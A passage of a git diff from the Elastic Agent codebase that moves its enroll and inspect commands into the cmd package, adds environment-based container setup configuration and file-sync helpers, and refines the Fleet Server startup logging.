filepath.Join(statePath, "data", "downloads") + if err := syncDir(srcDownloads, destDownloads); err != nil { + return fmt.Errorf("syncing download directory to STATE_PATH(%s) failed: %s", statePath, err) + } + paths.SetTop(topPath) + paths.SetConfig(configPath) + // when custom top path is provided the home directory is not versioned + paths.SetVersionHome(false) + // set LOGS_PATH is given + if logsPath := envWithDefault("", "LOGS_PATH"); logsPath != "" { + paths.SetLogs(logsPath) + // ensure that the logs directory exists + if err := os.MkdirAll(filepath.Join(logsPath), 0755); err != nil { + return fmt.Errorf("preparing LOGS_PATH(%s) failed: %s", logsPath, err) + } + } + return nil +} + +func syncDir(src string, dest string) error { + return filepath.Walk(src, func(path string, info os.FileInfo, err error) error { + if err != nil { + return err + } + relativePath := strings.TrimPrefix(path, src) + if info.IsDir() { + err = os.MkdirAll(filepath.Join(dest, relativePath), info.Mode()) + if err != nil { + return err + } + return nil + } + return copyFile(filepath.Join(dest, relativePath), path, info.Mode()) + }) +} + +func copyFile(destPath string, srcPath string, mode os.FileMode) error { + // if mode is unset; set to the same as the source file + if mode == 0 { + info, err := os.Stat(srcPath) + if err == nil { + // ignoring error because; os.Open will also error if the file cannot be stat'd + mode = info.Mode() + } + } + + src, err := os.Open(srcPath) + if err != nil { + return err + } + defer src.Close() + dest, err := os.OpenFile(destPath, os.O_CREATE|os.O_WRONLY, mode) + if err != nil { + return err + } + defer dest.Close() + _, err = io.Copy(dest, src) + return err +} + type kibanaPolicy struct { ID string `json:"id"` Name string `json:"name"` @@ -464,3 +694,97 @@ type kibanaAPIKeys struct { type kibanaAPIKeyDetail struct { Item kibanaAPIKey `json:"item"` } + +// setup configuration + +type setupConfig struct { + Fleet fleetConfig `config:"fleet"` + FleetServer fleetServerConfig `config:"fleet_server"` + Kibana kibanaConfig `config:"kibana"` +} + +type elasticsearchConfig struct { + CA string `config:"ca"` + Host string `config:"host"` + Username string `config:"username"` + Password string `config:"password"` +} + +type fleetConfig struct { + CA string `config:"ca"` + Enroll bool `config:"enroll"` + EnrollmentToken string `config:"enrollment_token"` + Force bool `config:"force"` + Insecure bool `config:"insecure"` + TokenName string `config:"token_name"` + TokenPolicyName string `config:"token_policy_name"` + URL string `config:"url"` +} + +type fleetServerConfig struct { + Cert string `config:"cert"` + CertKey string `config:"cert_key"` + Elasticsearch elasticsearchConfig `config:"elasticsearch"` + Enable bool `config:"enable"` + Host string `config:"host"` + InsecureHTTP bool `config:"insecure_http"` + PolicyID string `config:"policy_id"` + PolicyName string `config:"policy_name"` + Port string `config:"port"` +} + +type kibanaConfig struct { + Fleet kibanaFleetConfig `config:"fleet"` +} + +type kibanaFleetConfig struct { + CA string `config:"ca"` + Host string `config:"host"` + Password string `config:"password"` + Setup bool `config:"setup"` + Username string `config:"username"` +} + +func defaultAccessConfig() setupConfig { + cfg := setupConfig{ + Fleet: fleetConfig{ + CA: envWithDefault("", "FLEET_CA", "KIBANA_CA", "ELASTICSEARCH_CA"), + Enroll: envBool("FLEET_ENROLL", "FLEET_SERVER_ENABLE"), + EnrollmentToken: envWithDefault("", "FLEET_ENROLLMENT_TOKEN"), + Force: envBool("FLEET_FORCE"), + Insecure: envBool("FLEET_INSECURE"), + TokenName: envWithDefault("Default", "FLEET_TOKEN_NAME"), + TokenPolicyName: envWithDefault("", "FLEET_TOKEN_POLICY_NAME"), + URL: envWithDefault("", "FLEET_URL"), + }, + FleetServer: fleetServerConfig{ + Cert: envWithDefault("", "FLEET_SERVER_CERT"), + CertKey: envWithDefault("", "FLEET_SERVER_CERT_KEY"), + Elasticsearch: elasticsearchConfig{ + Host: envWithDefault("http://elasticsearch:9200", "FLEET_SERVER_ELASTICSEARCH_HOST", "ELASTICSEARCH_HOST"), + Username: envWithDefault("elastic", "FLEET_SERVER_ELASTICSEARCH_USERNAME", "ELASTICSEARCH_USERNAME"), + Password: envWithDefault("changeme", "FLEET_SERVER_ELASTICSEARCH_PASSWORD", "ELASTICSEARCH_PASSWORD"), + CA: envWithDefault("", "FLEET_SERVER_ELASTICSEARCH_CA", "ELASTICSEARCH_CA"), + }, + Enable: envBool("FLEET_SERVER_ENABLE"), + Host: envWithDefault("", "FLEET_SERVER_HOST"), + InsecureHTTP: envBool("FLEET_SERVER_INSECURE_HTTP"), + PolicyID: envWithDefault("", "FLEET_SERVER_POLICY_ID"), + PolicyName: envWithDefault("", "FLEET_SERVER_POLICY_NAME", "FLEET_TOKEN_POLICY_NAME"), + Port: envWithDefault("", "FLEET_SERVER_PORT"), + }, + Kibana: kibanaConfig{ + Fleet: kibanaFleetConfig{ + // Remove FLEET_SETUP in 8.x + // The FLEET_SETUP environment variable boolean is a fallback to the old name. The name was updated to + // reflect that its setting up Fleet in Kibana versus setting up Fleet Server. + Setup: envBool("KIBANA_FLEET_SETUP", "FLEET_SETUP"), + Host: envWithDefault("http://kibana:5601", "KIBANA_FLEET_HOST", "KIBANA_HOST"), + Username: envWithDefault("elastic", "KIBANA_FLEET_USERNAME", "KIBANA_USERNAME", "ELASTICSEARCH_USERNAME"), + Password: envWithDefault("changeme", "KIBANA_FLEET_PASSWORD", "KIBANA_PASSWORD", "ELASTICSEARCH_PASSWORD"), + CA: envWithDefault("", "KIBANA_FLEET_CA", "KIBANA_CA", "ELASTICSEARCH_CA"), + }, + }, + } + return cfg +} diff --git a/x-pack/elastic-agent/pkg/agent/cmd/enroll.go b/x-pack/elastic-agent/pkg/agent/cmd/enroll.go index 30f581331be..ec7cec1211d 100644 --- a/x-pack/elastic-agent/pkg/agent/cmd/enroll.go +++ b/x-pack/elastic-agent/pkg/agent/cmd/enroll.go @@ -12,10 +12,11 @@ import ( "strconv" "syscall" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/paths" + "github.com/spf13/cobra" c "github.com/elastic/beats/v7/libbeat/common/cli" - "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/configuration" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/warn" @@ -24,13 +25,13 @@ import ( "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" ) -func newEnrollCommandWithArgs(flags *globalFlags, _ []string, streams *cli.IOStreams) *cobra.Command { +func newEnrollCommandWithArgs(_ []string, streams *cli.IOStreams) *cobra.Command { cmd := &cobra.Command{ Use: "enroll", Short: "Enroll the Agent into Fleet", Long: "This will enroll the Agent into Fleet.", Run: func(c *cobra.Command, args []string) { - if err := enroll(streams, c, flags, args); err != nil { + if err := enroll(streams, c, args); err != nil { fmt.Fprintf(streams.Err, "Error: %v\n", err) os.Exit(1) } @@ -146,13 +147,13 @@ func buildEnrollmentFlags(cmd *cobra.Command, url string, token string) []string return args } -func enroll(streams *cli.IOStreams, cmd *cobra.Command, flags *globalFlags, args []string) error { +func enroll(streams *cli.IOStreams, cmd *cobra.Command, args []string) error { fromInstall, _ := cmd.Flags().GetBool("from-install") if !fromInstall { warn.PrintNotGA(streams.Out) } - pathConfigFile := flags.Config() + pathConfigFile := paths.ConfigFile() rawConfig, err := config.LoadFile(pathConfigFile) if err != nil { return errors.New(err, @@ -182,7 +183,7 @@ func enroll(streams *cli.IOStreams, cmd *cobra.Command, flags *globalFlags, args } // prompt only when it is not forced and is already enrolled - if !force && (cfg.Fleet != nil && cfg.Fleet.Enabled == true) { + if !force && (cfg.Fleet != nil && cfg.Fleet.Enabled) { confirm, err := c.Confirm("This will replace your current settings. Do you want to continue?", true) if err != nil { return errors.New(err, "problem reading prompt response") @@ -198,7 +199,7 @@ func enroll(streams *cli.IOStreams, cmd *cobra.Command, flags *globalFlags, args cfg.Settings.LoggingConfig.ToFiles = false cfg.Settings.LoggingConfig.ToStderr = true - logger, err := logger.NewFromConfig("", cfg.Settings.LoggingConfig) + logger, err := logger.NewFromConfig("", cfg.Settings.LoggingConfig, false) if err != nil { return err } @@ -225,7 +226,7 @@ func enroll(streams *cli.IOStreams, cmd *cobra.Command, flags *globalFlags, args ctx := handleSignal(context.Background()) - options := application.EnrollCmdOption{ + options := enrollCmdOption{ ID: "", // TODO(ph), This should not be an empty string, will clarify in a new PR. EnrollAPIKey: enrollmentToken, URL: url, @@ -234,7 +235,7 @@ func enroll(streams *cli.IOStreams, cmd *cobra.Command, flags *globalFlags, args Insecure: insecure, UserProvidedMetadata: make(map[string]interface{}), Staging: staging, - FleetServer: application.EnrollCmdFleetServerOption{ + FleetServer: enrollCmdFleetServerOption{ ConnStr: fServer, ElasticsearchCA: fElasticSearchCA, PolicyID: fPolicy, @@ -247,7 +248,7 @@ func enroll(streams *cli.IOStreams, cmd *cobra.Command, flags *globalFlags, args }, } - c, err := application.NewEnrollCmd( + c, err := newEnrollCmd( logger, &options, pathConfigFile, diff --git a/x-pack/elastic-agent/pkg/agent/application/enroll_cmd.go b/x-pack/elastic-agent/pkg/agent/cmd/enroll_cmd.go similarity index 70% rename from x-pack/elastic-agent/pkg/agent/application/enroll_cmd.go rename to x-pack/elastic-agent/pkg/agent/cmd/enroll_cmd.go index ff0b22a1159..2f9f98b5975 100644 --- a/x-pack/elastic-agent/pkg/agent/application/enroll_cmd.go +++ b/x-pack/elastic-agent/pkg/agent/cmd/enroll_cmd.go @@ -2,7 +2,7 @@ // or more contributor license agreements. Licensed under the Elastic License; // you may not use this file except in compliance with the Elastic License. -package application +package cmd import ( "bytes" @@ -10,8 +10,6 @@ import ( "fmt" "io" "math/rand" - "net/http" - "net/url" "os" "time" @@ -22,8 +20,11 @@ import ( "github.com/elastic/beats/v7/libbeat/common/backoff" "github.com/elastic/beats/v7/libbeat/common/transport/tlscommon" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/filelock" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/info" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/paths" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/configuration" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/control/client" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/control/proto" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" @@ -31,14 +32,16 @@ import ( "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/authority" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi" + fleetclient "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi/client" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/kibana" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/release" ) const ( maxRetriesstoreAgentInfo = 5 - waitingForAgent = "waiting for Elastic Agent to start" - waitingForFleetServer = "waiting for Elastic Agent to start Fleet Server" + waitingForAgent = "Waiting for Elastic Agent to start" + waitingForFleetServer = "Waiting for Elastic Agent to start Fleet Server" + defaultFleetServerHost = "0.0.0.0" defaultFleetServerPort = 8220 ) @@ -51,36 +54,18 @@ type saver interface { Save(io.Reader) error } -type storeLoad interface { - saver - Load() (io.ReadCloser, error) -} - -type clienter interface { - Send( - ctx context.Context, - method string, - path string, - params url.Values, - headers http.Header, - body io.Reader, - ) (*http.Response, error) - - URI() string -} - -// EnrollCmd is an enroll subcommand that interacts between the Kibana API and the Agent. -type EnrollCmd struct { +// enrollCmd is an enroll subcommand that interacts between the Kibana API and the Agent. +type enrollCmd struct { log *logger.Logger - options *EnrollCmdOption - client clienter + options *enrollCmdOption + client fleetclient.Sender configStore saver kibanaConfig *kibana.Config agentProc *process.Info } -// EnrollCmdFleetServerOption define all the supported enrollment options for bootstrapping with Fleet Server. -type EnrollCmdFleetServerOption struct { +// enrollCmdFleetServerOption define all the supported enrollment options for bootstrapping with Fleet Server. +type enrollCmdFleetServerOption struct { ConnStr string ElasticsearchCA string PolicyID string @@ -92,8 +77,8 @@ type EnrollCmdFleetServerOption struct { SpawnAgent bool } -// EnrollCmdOption define all the supported enrollment option. -type EnrollCmdOption struct { +// enrollCmdOption define all the supported enrollment option. +type enrollCmdOption struct { ID string URL string CAs []string @@ -102,10 +87,10 @@ type EnrollCmdOption struct { UserProvidedMetadata map[string]interface{} EnrollAPIKey string Staging string - FleetServer EnrollCmdFleetServerOption + FleetServer enrollCmdFleetServerOption } -func (e *EnrollCmdOption) kibanaConfig() (*kibana.Config, error) { +func (e *enrollCmdOption) kibanaConfig() (*kibana.Config, error) { cfg, err := kibana.NewConfigFromURL(e.URL) if err != nil { return nil, err @@ -130,21 +115,21 @@ func (e *EnrollCmdOption) kibanaConfig() (*kibana.Config, error) { return cfg, nil } -// NewEnrollCmd creates a new enroll command that will registers the current beats to the remote +// newEnrollCmd creates a new enroll command that will registers the current beats to the remote // system. -func NewEnrollCmd( +func newEnrollCmd( log *logger.Logger, - options *EnrollCmdOption, + options *enrollCmdOption, configPath string, -) (*EnrollCmd, error) { +) (*enrollCmd, error) { store := storage.NewReplaceOnSuccessStore( configPath, - DefaultAgentFleetConfig, + application.DefaultAgentFleetConfig, storage.NewDiskStore(paths.AgentConfigFile()), ) - return NewEnrollCmdWithStore( + return newEnrollCmdWithStore( log, options, configPath, @@ -152,14 +137,14 @@ func NewEnrollCmd( ) } -//NewEnrollCmdWithStore creates an new enrollment and accept a custom store. -func NewEnrollCmdWithStore( +// newEnrollCmdWithStore creates an new enrollment and accept a custom store. +func newEnrollCmdWithStore( log *logger.Logger, - options *EnrollCmdOption, + options *enrollCmdOption, configPath string, store saver, -) (*EnrollCmd, error) { - return &EnrollCmd{ +) (*enrollCmd, error) { + return &enrollCmd{ log: log, options: options, configStore: store, @@ -167,7 +152,7 @@ func NewEnrollCmdWithStore( } // Execute tries to enroll the agent into Fleet. -func (c *EnrollCmd) Execute(ctx context.Context) error { +func (c *enrollCmd) Execute(ctx context.Context) error { var err error defer c.stopAgent() // ensure its stopped no matter what if c.options.FleetServer.ConnStr != "" { @@ -185,7 +170,7 @@ func (c *EnrollCmd) Execute(ctx context.Context) error { errors.M(errors.MetaKeyURI, c.options.URL)) } - c.client, err = fleetapi.NewWithConfig(c.log, c.kibanaConfig) + c.client, err = fleetclient.NewWithConfig(c.log, c.kibanaConfig) if err != nil { return errors.New( err, "Error", @@ -209,7 +194,7 @@ func (c *EnrollCmd) Execute(ctx context.Context) error { return nil } -func (c *EnrollCmd) fleetServerBootstrap(ctx context.Context) error { +func (c *enrollCmd) fleetServerBootstrap(ctx context.Context) error { c.log.Debug("verifying communication with running Elastic Agent daemon") agentRunning := true _, err := getDaemonStatus(ctx) @@ -229,6 +214,10 @@ func (c *EnrollCmd) fleetServerBootstrap(ctx context.Context) error { c.options.FleetServer.ConnStr, c.options.FleetServer.PolicyID, c.options.FleetServer.Host, c.options.FleetServer.Port, c.options.FleetServer.Cert, c.options.FleetServer.CertKey, c.options.FleetServer.ElasticsearchCA) + if err != nil { + return err + } + configToStore := map[string]interface{}{ "fleet": fleetConfig, } @@ -241,6 +230,7 @@ func (c *EnrollCmd) fleetServerBootstrap(ctx context.Context) error { return err } + var agentSubproc <-chan *os.ProcessState if agentRunning { // reload the already running agent err = c.daemonReload(ctx) @@ -249,20 +239,20 @@ func (c *EnrollCmd) fleetServerBootstrap(ctx context.Context) error { } } else { // spawn `run` as a subprocess so enroll can perform the bootstrap process of Fleet Server - err = c.startAgent() + agentSubproc, err = c.startAgent() if err != nil { return err } } - err = waitForFleetServer(ctx, c.log) + err = waitForFleetServer(ctx, agentSubproc, c.log) if err != nil { return errors.New(err, "fleet-server never started by elastic-agent daemon", errors.TypeApplication) } return nil } -func (c *EnrollCmd) prepareFleetTLS() error { +func (c *enrollCmd) prepareFleetTLS() error { host := c.options.FleetServer.Host if host == "" { host = "localhost" @@ -306,10 +296,14 @@ func (c *EnrollCmd) prepareFleetTLS() error { c.options.URL = fmt.Sprintf("https://%s:%d", hostname, port) c.options.CAs = []string{string(ca.Crt())} } + // running with custom Cert and CertKey; URL is required to be set + if c.options.URL == "" { + return errors.New("url is required when a certificate is provided") + } return nil } -func (c *EnrollCmd) daemonReload(ctx context.Context) error { +func (c *enrollCmd) daemonReload(ctx context.Context) error { daemon := client.New() err := daemon.Connect(ctx) if err != nil { @@ -319,7 +313,7 @@ func (c *EnrollCmd) daemonReload(ctx context.Context) error { return daemon.Restart(ctx) } -func (c *EnrollCmd) enrollWithBackoff(ctx context.Context) error { +func (c *enrollCmd) enrollWithBackoff(ctx context.Context) error { delay(ctx, enrollDelay) err := c.enroll(ctx) @@ -347,10 +341,10 @@ func (c *EnrollCmd) enrollWithBackoff(ctx context.Context) error { return err } -func (c *EnrollCmd) enroll(ctx context.Context) error { +func (c *enrollCmd) enroll(ctx context.Context) error { cmd := fleetapi.NewEnrollCmd(c.client) - metadata, err := metadata() + metadata, err := info.Metadata() if err != nil { return errors.New(err, "acquiring metadata failed") } @@ -427,21 +421,35 @@ func (c *EnrollCmd) enroll(ctx context.Context) error { return nil } -func (c *EnrollCmd) startAgent() error { +func (c *enrollCmd) startAgent() (<-chan *os.ProcessState, error) { cmd, err := os.Executable() if err != nil { - return err + return nil, err } c.log.Info("Spawning Elastic Agent daemon as a subprocess to complete bootstrap process.") - proc, err := process.Start(c.log, cmd, nil, os.Geteuid(), os.Getegid(), "run") + args := []string{ + "run", "-c", paths.ConfigFile(), + "--path.home", paths.Top(), "--path.config", paths.Config(), + "--path.logs", paths.Logs(), + } + if !paths.IsVersionHome() { + args = append(args, "--path.home.unversioned") + } + proc, err := process.Start( + c.log, cmd, nil, os.Geteuid(), os.Getegid(), args...) if err != nil { - return err + return nil, err } + resChan := make(chan *os.ProcessState) + go func() { + procState, _ := proc.Process.Wait() + resChan <- procState + }() c.agentProc = proc - return nil + return resChan, nil } -func (c *EnrollCmd) stopAgent() { +func (c *enrollCmd) stopAgent() { if c.agentProc != nil { c.agentProc.StopWait() c.agentProc = nil @@ -481,7 +489,7 @@ type waitResult struct { err error } -func waitForFleetServer(ctx context.Context, log *logger.Logger) error { +func waitForFleetServer(ctx context.Context, agentSubproc <-chan *os.ProcessState, log *logger.Logger) error { ctx, cancel := context.WithTimeout(ctx, 2*time.Minute) defer cancel() @@ -490,6 +498,7 @@ func waitForFleetServer(ctx context.Context, log *logger.Logger) error { defer innerCancel() go func() { msg := "" + msgCount := 0 for { <-time.After(1 * time.Second) status, err := getDaemonStatus(innerCtx) @@ -498,29 +507,50 @@ func waitForFleetServer(ctx context.Context, log *logger.Logger) error { return } if err != nil { - log.Debug(waitingForAgent) + log.Debugf("%s: %s", waitingForAgent, err) if msg != waitingForAgent { msg = waitingForAgent + msgCount = 0 log.Info(waitingForAgent) + } else { + msgCount++ + if msgCount > 5 { + msgCount = 0 + log.Infof("%s: %s", waitingForAgent, err) + } } continue } app := getAppFromStatus(status, "fleet-server") if app == nil { - log.Debug(waitingForFleetServer) + err = errors.New("no fleet-server application running") + log.Debugf("%s: %s", waitingForFleetServer, err) if msg != waitingForFleetServer { msg = waitingForFleetServer + msgCount = 0 log.Info(waitingForFleetServer) + } else { + msgCount++ + if msgCount > 5 { + msgCount = 0 + log.Infof("%s: %s", waitingForFleetServer, err) + } } continue } - log.Debugf("fleet-server status: %s - %s", app.Status, app.Message) + log.Debugf("%s: %s - %s", waitingForFleetServer, app.Status, app.Message) if app.Status == proto.Status_DEGRADED || app.Status == proto.Status_HEALTHY { // app has started and is running + if app.Message != "" { + log.Infof("Fleet Server - %s", app.Message) + } resChan <- waitResult{} break } else if app.Status == proto.Status_FAILED { // app completely failed; exit now + if app.Message != "" { + log.Infof("Fleet Server - %s", app.Message) + } resChan <- waitResult{err: errors.New(app.Message)} break } @@ -528,18 +558,36 @@ func waitForFleetServer(ctx context.Context, log *logger.Logger) error { appMsg := fmt.Sprintf("Fleet Server - %s", app.Message) if msg != appMsg { msg = appMsg + msgCount = 0 log.Info(appMsg) + } else { + msgCount++ + if msgCount > 5 { + msgCount = 0 + log.Info(appMsg) + } } } } }() var res waitResult - select { - case <-ctx.Done(): - innerCancel() - res = <-resChan - case res = <-resChan: + if agentSubproc == nil { + select { + case <-ctx.Done(): + innerCancel() + res = <-resChan + case res = <-resChan: + } + } else { + select { + case ps := <-agentSubproc: + res = waitResult{err: fmt.Errorf("spawned Elastic Agent exited unexpectedly: %s", ps)} + case <-ctx.Done(): + innerCancel() + res = <-resChan + case res = <-resChan: + } } if res.err != nil { @@ -587,3 +635,59 @@ func storeAgentInfo(s saver, reader io.Reader) error { return nil } + +func createFleetServerBootstrapConfig(connStr string, policyID string, host string, port uint16, cert string, key string, esCA string) (*configuration.FleetAgentConfig, error) { + es, err := configuration.ElasticsearchFromConnStr(connStr) + if err != nil { + return nil, err + } + if esCA != "" { + es.TLS = &tlscommon.Config{ + CAs: []string{esCA}, + } + } + if host == "" { + host = defaultFleetServerHost + } + if port == 0 { + port = defaultFleetServerPort + } + cfg := configuration.DefaultFleetAgentConfig() + cfg.Enabled = true + cfg.Server = &configuration.FleetServerConfig{ + Bootstrap: true, + Output: configuration.FleetServerOutputConfig{ + Elasticsearch: es, + }, + Host: host, + Port: port, + } + if policyID != "" { + cfg.Server.Policy = &configuration.FleetServerPolicyConfig{ID: policyID} + } + if cert != "" || key != "" { + cfg.Server.TLS = &tlscommon.Config{ + Certificate: tlscommon.CertificateConfig{ + Certificate: cert, + Key: key, + }, + } + } + + if err := cfg.Valid(); err != nil { + return nil, errors.New(err, "invalid enrollment options", errors.TypeConfig) + } + return cfg, nil +} + +func createFleetConfigFromEnroll(accessAPIKey string, kbn *kibana.Config) (*configuration.FleetAgentConfig, error) { + cfg := configuration.DefaultFleetAgentConfig() + cfg.Enabled = true + cfg.AccessAPIKey = accessAPIKey + cfg.Kibana = kbn + + if err := cfg.Valid(); err != nil { + return nil, errors.New(err, "invalid enrollment options", errors.TypeConfig) + } + return cfg, nil +} diff --git a/x-pack/elastic-agent/pkg/agent/application/enroll_cmd_test.go b/x-pack/elastic-agent/pkg/agent/cmd/enroll_cmd_test.go similarity index 96% rename from x-pack/elastic-agent/pkg/agent/application/enroll_cmd_test.go rename to x-pack/elastic-agent/pkg/agent/cmd/enroll_cmd_test.go index fe6786276d2..8f5b7c4f8a5 100644 --- a/x-pack/elastic-agent/pkg/agent/application/enroll_cmd_test.go +++ b/x-pack/elastic-agent/pkg/agent/cmd/enroll_cmd_test.go @@ -2,7 +2,7 @@ // or more contributor license agreements. Licensed under the Elastic License; // you may not use this file except in compliance with the Elastic License. -package application +package cmd import ( "bytes" @@ -45,7 +45,7 @@ func (m *mockStore) Save(in io.Reader) error { } func TestEnroll(t *testing.T) { - log, _ := logger.New("tst") + log, _ := logger.New("tst", false) t.Run("fail to save is propagated", withTLSServer( func(t *testing.T) *http.ServeMux { @@ -81,9 +81,9 @@ func TestEnroll(t *testing.T) { url := "https://" + host store := &mockStore{Err: errors.New("fail to save")} - cmd, err := NewEnrollCmdWithStore( + cmd, err := newEnrollCmdWithStore( log, - &EnrollCmdOption{ + &enrollCmdOption{ ID: "my-id", URL: url, CAs: []string{caFile}, @@ -134,9 +134,9 @@ func TestEnroll(t *testing.T) { url := "https://" + host store := &mockStore{} - cmd, err := NewEnrollCmdWithStore( + cmd, err := newEnrollCmdWithStore( log, - &EnrollCmdOption{ + &enrollCmdOption{ ID: "my-id", URL: url, CAs: []string{caFile}, @@ -191,9 +191,9 @@ func TestEnroll(t *testing.T) { }, func(t *testing.T, host string) { url := "http://" + host + "/" store := &mockStore{} - cmd, err := NewEnrollCmdWithStore( + cmd, err := newEnrollCmdWithStore( log, - &EnrollCmdOption{ + &enrollCmdOption{ ID: "my-id", URL: url, CAs: []string{}, @@ -251,9 +251,9 @@ func TestEnroll(t *testing.T) { }, func(t *testing.T, host string) { url := "http://" + host store := &mockStore{} - cmd, err := NewEnrollCmdWithStore( + cmd, err := newEnrollCmdWithStore( log, - &EnrollCmdOption{ + &enrollCmdOption{ ID: "my-id", URL: url, CAs: []string{}, @@ -296,9 +296,9 @@ func TestEnroll(t *testing.T) { }, func(t *testing.T, host string) { url := "http://" + host store := &mockStore{} - cmd, err := NewEnrollCmdWithStore( + cmd, err := newEnrollCmdWithStore( log, - &EnrollCmdOption{ + &enrollCmdOption{ ID: "my-id", URL: url, CAs: []string{}, diff --git a/x-pack/elastic-agent/pkg/agent/cmd/include.go b/x-pack/elastic-agent/pkg/agent/cmd/include.go index b955c85418f..5bc763c6df0 100644 --- a/x-pack/elastic-agent/pkg/agent/cmd/include.go +++ b/x-pack/elastic-agent/pkg/agent/cmd/include.go @@ -11,6 +11,7 @@ import ( _ "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/composable/providers/env" _ "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/composable/providers/host" _ "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/composable/providers/kubernetes" + _ "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/composable/providers/kubernetessecrets" _ "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/composable/providers/local" _ "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/composable/providers/localdynamic" _ "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/composable/providers/path" diff --git a/x-pack/elastic-agent/pkg/agent/cmd/inspect.go b/x-pack/elastic-agent/pkg/agent/cmd/inspect.go index bf6d3009f10..e66a15dfe3f 100644 --- a/x-pack/elastic-agent/pkg/agent/cmd/inspect.go +++ b/x-pack/elastic-agent/pkg/agent/cmd/inspect.go @@ -5,60 +5,74 @@ package cmd import ( + "context" "fmt" "os" "github.com/spf13/cobra" + "gopkg.in/yaml.v2" - "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application" + "github.com/elastic/beats/v7/libbeat/logp" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/filters" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/info" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/paths" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/pipeline" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/pipeline/emitter" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/pipeline/emitter/modifiers" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/configuration" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/program" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/transpiler" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/capabilities" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/cli" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/composable" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/config" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/config/operations" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/monitoring/noop" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/status" + "github.com/elastic/go-sysinfo" ) -func newInspectCommandWithArgs(flags *globalFlags, s []string, streams *cli.IOStreams) *cobra.Command { +func newInspectCommandWithArgs(s []string, streams *cli.IOStreams) *cobra.Command { cmd := &cobra.Command{ Use: "inspect", Short: "Shows configuration of the agent", Long: "Shows current configuration of the agent", Args: cobra.ExactArgs(0), Run: func(c *cobra.Command, args []string) { - command, err := application.NewInspectConfigCmd(flags.Config()) - if err != nil { - fmt.Fprintf(streams.Err, "%v\n", err) - os.Exit(1) - } - - if err := command.Execute(); err != nil { + if err := inspectConfig(paths.ConfigFile()); err != nil { fmt.Fprintf(streams.Err, "%v\n", err) os.Exit(1) } }, } - cmd.AddCommand(newInspectOutputCommandWithArgs(flags, s, streams)) + cmd.AddCommand(newInspectOutputCommandWithArgs(s, streams)) return cmd } -func newInspectOutputCommandWithArgs(flags *globalFlags, _ []string, streams *cli.IOStreams) *cobra.Command { +func newInspectOutputCommandWithArgs(_ []string, streams *cli.IOStreams) *cobra.Command { cmd := &cobra.Command{ Use: "output", Short: "Displays configuration generated for output", Long: "Displays configuration generated for output.\nIf no output is specified list of output is displayed", Args: cobra.MaximumNArgs(2), - Run: func(c *cobra.Command, args []string) { + RunE: func(c *cobra.Command, args []string) error { outName, _ := c.Flags().GetString("output") program, _ := c.Flags().GetString("program") - - command, err := application.NewInspectOutputCmd(flags.Config(), outName, program) + cfgPath := paths.ConfigFile() + agentInfo, err := info.NewAgentInfo() if err != nil { - fmt.Fprintf(streams.Err, "%v\n", err) - os.Exit(1) + return err } - if err := command.Execute(); err != nil { - fmt.Fprintf(streams.Err, 